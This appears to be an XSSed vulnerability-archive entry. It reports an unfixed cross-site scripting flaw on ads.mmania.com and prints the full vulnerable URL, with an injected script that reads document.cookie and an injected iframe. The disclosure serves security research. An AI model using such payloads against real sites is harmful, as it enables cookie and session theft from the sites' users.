Unfixed XSS vulnerability at ads.mmania.com

ID XSSED:71368
Type xssed
Reporter warvector
Modified 2011-11-12T00:00:00


Security researcher warvector, has submitted on 24/12/2010 a cross-site-scripting (XSS) vulnerability affecting ads.mmania.com, which at the time of submission ranked 17963896 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 11/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://ads.mmania.com/displaycf.js.php?r=54898de7<script>alert(document.cookie)</script>&cc=tapz"></iframe><script>alert(1337)</script><iframe src="http://www.xssed.com/"></iframe>